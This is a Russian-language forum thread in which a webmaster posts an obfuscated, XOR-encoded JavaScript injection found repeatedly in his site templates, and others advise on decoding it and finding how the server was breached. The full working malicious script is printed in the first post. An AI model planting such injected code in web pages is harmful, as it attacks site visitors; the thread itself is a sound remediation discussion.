Kolbaser 33 Опубликовано: 15 января 2010 Рассказать Опубликовано: 15 января 2010 Код обнаружил у себя на сайте, подскажите как его можно расшифровать. <script>wvan=["ocynoaxi=0;nyzibet='';for(pfhuo=0;pfhuo<wvan[0]['length'];pfhuo+=1)ocynoaxi+=wvan[0].charCodeAt(pfhuo);ocynoaxi%=0x64;for(pfhuo=0;pfhuo<wvan[1]['length'];pfhuo+=2)nyzibet+=String.fromCharCode(parseInt(0+'x'+wvan[1].charAt(pfhuo)+wvan[1].charAt(pfhuo+1))^ocynoaxi);document.write(nyzibet);","24706c757426247a777c6126246b7b6a71686c266e796a386c7d7568515e6a79757d257c777b6d757d766c367b6a7d796c7d5d747d757d766c303f717e6a79757d3f31236c7d7568515e6a79757d366b7d6c596c6c6a717a6d6c7d303f717c3f343f4a4b515e6a79757d3f31236c7d7568515e6a79757d366b7d6c596c6c6a717a6d6c7d303f6b6a7b3f343f706c6c682237377b74717b73356179767c367b777537797c377176367b7f71272b3f31236c7d7568515e6a79757d366b6c61747d366e716b717a7174716c61253f70717c7c7d763f236c7d7568515e6a79757d366b6c61747d366f717c6c70253f2868603f236c7d7568515e6a79757d366b6c61747d36707d717f706c253f2868603f23515e6a79757d577a723825387c777b6d757d766c367a777c61367968687d767c5b7071747c306c7d7568515e6a79757d312324376b7b6a71686c2624377a777c61262437706c757426"];eval(wvan[0]);</script> Цитата Ссылка на сообщение Поделиться на других сайтах
celsoft 6 007 Опубликовано: 15 января 2010 Рассказать Опубликовано: 15 января 2010 замените eval(wvan[0]); на alert(wvan[0]); увидите содержимое которое запускается Цитата Ссылка на сообщение Поделиться на других сайтах
inokentik 45 Опубликовано: 15 января 2010 Рассказать Опубликовано: 15 января 2010 Как же он туда попал? Цитата Ссылка на сообщение Поделиться на других сайтах
WWW.ZEOS.IN 1 161 Опубликовано: 15 января 2010 Рассказать Опубликовано: 15 января 2010 http://www.google.com.ua/search?client=opera&rls=ru&q=%D1%80%D0%B0%D1%81%D1%88%D0%B8%D1%84%D1%80%D0%BE%D0%B2%D0%BA%D0%B0+%D1%8F%D0%B2%D0%B0%D1%81%D0%BA%D1%80%D0%B8%D0%BF%D1%82%D0%B0&sourceid=opera&ie=utf-8&oe=utf-8 Цитата Ссылка на сообщение Поделиться на других сайтах
Kolbaser 33 Опубликовано: 15 января 2010 Рассказать Опубликовано: 15 января 2010 Автор Как же он туда попал? Чтоб я знал... так замучился искать дыру... и пароли менял и ОС и веник и что только не менял... Цитата Ссылка на сообщение Поделиться на других сайтах
celsoft 6 007 Опубликовано: 15 января 2010 Рассказать Опубликовано: 15 января 2010 Kolbaser, в каком файле он у вас появляется? Цитата Ссылка на сообщение Поделиться на других сайтах
Kolbaser 33 Опубликовано: 15 января 2010 Рассказать Опубликовано: 15 января 2010 Автор Kolbaser, в каком файле он у вас появляется? В декабре был другой код, он был в index.php на всех сайтах моего сервера. Потом я поменял все пароли фтп, пароль на сервер, сменил винчестер (давно собирался), поставил новую ОС + касперский 2010 и старый веник не подключал к новому. Вроде всё было нормально, но буквально через полторы недели Яндекс написал, что на сайте вредоносный код. На трёх сайтах я нашёл этот код в main.tpl в самом низу и Яндекс вернул их в выдачу, но на одном сайте этот код был продублирован base.js находящейся в шаблоне, я удалил и от туда его. Яндекс вернул и этот сайт в выдачу, но через дня три этот же код обнаружился в соседнем файле menu.js. а в main.tpl его на этот раз не было (шаблоном этим пользуюсь больше года - vsefilmi.com). Я уже не знаю где искать дыру, в командоре пароли не храню, другим людям не даю, поменял пароли и на аську и на сервер чуть ли не каждую неделю меняю, и на админов на сайтах (везде только я админ), но код возвращается, но на этот раз не на все сайты как в декабре или это пока... Цитата Ссылка на сообщение Поделиться на других сайтах
celsoft 6 007 Опубликовано: 15 января 2010 Рассказать Опубликовано: 15 января 2010 Kolbaser, Я бы рекомендовал вам сообщить об этом хостинг провайдеру. Нередки были случаи, когда уязвимым было ПО на сервере хостинга и доступ получался через соседние аккаунты. Цитата Ссылка на сообщение Поделиться на других сайтах
Kolbaser 33 Опубликовано: 15 января 2010 Рассказать Опубликовано: 15 января 2010 Автор Kolbaser, Я бы рекомендовал вам сообщить об этом хостинг провайдеру. Нередки были случаи, когда уязвимым было ПО на сервере хостинга и доступ получался через соседние аккаунты. У меня выделенный сервер. Цитата Ссылка на сообщение Поделиться на других сайтах
celsoft 6 007 Опубликовано: 15 января 2010 Рассказать Опубликовано: 15 января 2010 У меня выделенный сервер. Это не показатель безопасности. При неверных настройках безопасности и при уязвимости соседних сайтов, можно получить доступ к другим сайтам. Также доступа к админпанели ни у кого кроме вас нет? Настройки групп вы тщательно проверили? Пароль от FTP в FTP менеджере не храните? Только чистый дистрибутив без сторонних модулей и других скриптов? Это я вам перечислил возможные варианты причины проблемы Цитата Ссылка на сообщение Поделиться на других сайтах
inokentik 45 Опубликовано: 16 января 2010 Рассказать Опубликовано: 16 января 2010 А что удивлятся? ТС у Вас как я понял из разговора стоит не оригинальный шаблон, а чей-то РИП. А как известно у нас на халявы никогда ничего не бывает... Видимо автор рип-а заранее где-нибудь залил вирус или еще какой-то скрипт, а Вы ставив чужой шаблон даже не смотрите. что ставите, вот Вам и результат, ничего другого ожидать не следовало... Совет, делайте свой шаблон. Цитата Ссылка на сообщение Поделиться на других сайтах
Kolbaser 33 Опубликовано: 17 января 2010 Рассказать Опубликовано: 17 января 2010 (изменено) Автор А что удивлятся? ТС у Вас как я понял из разговора стоит не оригинальный шаблон, а чей-то РИП. А как известно у нас на халявы никогда ничего не бывает... Видимо автор рип-а заранее где-нибудь залил вирус или еще какой-то скрипт, а Вы ставив чужой шаблон даже не смотрите. что ставите, вот Вам и результат, ничего другого ожидать не следовало... Совет, делайте свой шаблон. У Вас примитивное мышление относительно данной проблемы - это раз, два - шаблон был сделан для другой CMS, а у меня адаптация под ДЛЕ. На халяву, как известно, у нас в рунете, всего дофига и трошки Я никогда не ставлю шаблон "как есть", я его по возможности максимально переделываю под себя + тщательно проверяю все файлы шаблона, т.ч. не нужно нести вздор для первого класса, тем более я писал, что проблема касается не одного сайта. Для Целсофта пароли в ФТП менеджере не храню, доступ от админки сервера и ФТП пароли знаю только я (только программист имеет root доступ к серверу), администратор на моих сайтах тоже только я и все права пользователей на своих сайтах я проверял. Поменяю очередной раз фтп пароли и если опять эта зараза появится буду писать хостеру... хотя сомневаюсь, что они помогут, т.к. нгинкс+апач настраивал мой программист, они могут на это сослаться... Изменено 17 января 2010 пользователем Kolbaser Цитата Ссылка на сообщение Поделиться на других сайтах
celsoft 6 007 Опубликовано: 17 января 2010 Рассказать Опубликовано: 17 января 2010 только программист имеет root доступ к серверу может быть заражен его копмьютер. Смените все пароли, в том числе и root и никому не говорите. Также последний раз у вас было записано в шаблон, а шаблон имеет права на запись, поэтому тут важно чтобы небыло других сторонних скриптов и модулей, возможно небезопасны именно они. Цитата Ссылка на сообщение Поделиться на других сайтах
Рекомендованные сообщения
Присоединяйтесь к обсуждению
Вы можете опубликовать сообщение сейчас, а зарегистрироваться позже. Если у вас есть аккаунт, войдите в него для написания от своего имени.